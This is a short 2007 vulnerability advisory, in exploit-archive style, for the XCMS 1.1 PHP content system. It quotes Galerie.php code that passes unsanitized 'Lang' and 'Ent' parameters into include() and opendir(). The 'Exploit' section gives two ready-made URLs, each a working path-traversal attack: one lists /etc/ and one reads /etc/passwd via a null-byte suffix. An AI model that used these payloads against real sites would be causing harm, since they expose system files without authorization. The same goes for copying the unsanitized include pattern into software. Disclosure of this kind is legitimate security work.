XCMS 1.1 (Galerie.php) Local File Inclusion Vulnerabilities

2007-06-30 00:00:00

#Author:: BlackNDoor | [email protected]
#Homepage:: www.learntohell.net
#
#Script:: XCMS : CMS
#Version:: 1.1
#Type:: Remote Directory Listing & Local File Include
#
#Source:: http://groupeclan.free.fr/XCMS.zip

#Bug::
-> Files:

/Module/Galerie.php.php

-> vulncode:

if(!isset($_GET['Lang'])) { $Lang="fr"; } else { $Lang=$_GET['Lang']; }
if(!isset($_GET['Ent'])) { $Ent='false'; } else { $Ent=$_GET['Ent']; }
include('Lang/' . $Lang . '.lang'); <--- Local File Include
if($Ent)
{
$Nb = -1;
$Dossier = opendir("../Images/$Lang/$Ent"); <--- Directory Listing


#Exploit::

http://www.site.com/[path to XCMS]/Module/Galerie.php?Ent=../../../../../../etc/
http://www.site.com/[path to XCMS]/Module/Galerie.php?Lang=../../../../../../etc/passwd%00

#thanks:: str0ke

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.